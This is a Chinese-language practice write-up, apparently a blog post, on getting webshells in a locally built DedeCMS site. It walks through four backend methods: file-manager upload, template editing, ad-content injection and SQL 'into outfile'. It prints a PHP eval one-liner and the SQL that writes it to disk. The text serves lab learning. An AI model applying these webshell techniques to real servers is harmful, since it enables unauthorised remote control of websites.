Dedecms 是 织梦团队 的php网站管理系统 使用 小皮搭建网站
1.搭建dedecms网站
下载Dedecms压缩包,解压后,放在小皮搭建的网站根目录下。
开启小皮的Apache或者Nginx和MySQL服务
2. 获取webshell
2.1 姿势⼀:通过⽂件管理器上传WebShell
思路:dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传 php⽂件获取webshell..
2.1.1 访问网站进行安装
访问网址:ip/网址根目录的文件名/其中的uploads文件夹/install
http://172.16.2.41/DedeCMS/uploads/install
逐步完成安装,参数配置 数据库连接小皮的MySQL数据库。
2.1.2 配置相关信息,并进行后台登录
#信息
username:admin
password:123456
2.1.3 上传一句话木马
登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK
2.1.4 访问文件,蚁剑连接
双击shell.php访问,将url在蚁剑进行连接,即获得webshell
2.2 姿势⼆:修改模板⽂件拿WebShell
2.2.1 修改网站默认模板,写入一句话木马
与WPCMS类似,直接修改模板拿WebShell..
点击 【模板】 --》 【默认模板管理】 --》 【index.htm】
---》【修改】 在⽂件修改中添加phpinfo();....如下 点击保存
2.2.2 更新主页
点击 【⽣成】 --》 【更新主⻚ HTML 】 --》将主⻚位置修改为 【 ../index.php 】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化.
2.2.3 访问主页
url:172.16.2.41/DedeCMS/uploads/index.php
点击浏览,即可发现phpinfo()执行成功
2.3 姿势三:后台任意命令执⾏拿WebShell
点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】
点击【代码】
获取拼接的部分路径:/DedeCMS/uploads/plus/ad_js.php?aid=1
拼接url进行访问:http://172.16.2.41/DedeCMS/uploads/plus/ad_js.php?aid=1
蚁剑进行连接,即获得webshell
2.4 姿势四: 通过后台sql命令执⾏拿webshell
点击系统---SQL命令行工具
输入:select @@basedir; 发现页面显示目录地址 可判断出网站根目录
into outfile 写入一句话木马文件
select '<?php @eval($_POST[cmd]);>' into outfile 'E:/phpstudy_pro/WWW/shell.php'
访问该木马文件,蚁剑进行连接,即获得webshell
DEDECMS 织梦 网站框架常见漏洞的利用
多种获取shell的方法练习。
练习结束,望大家能有所帮助和收获。
拜拜。。。
-------------2025/3/20 21:51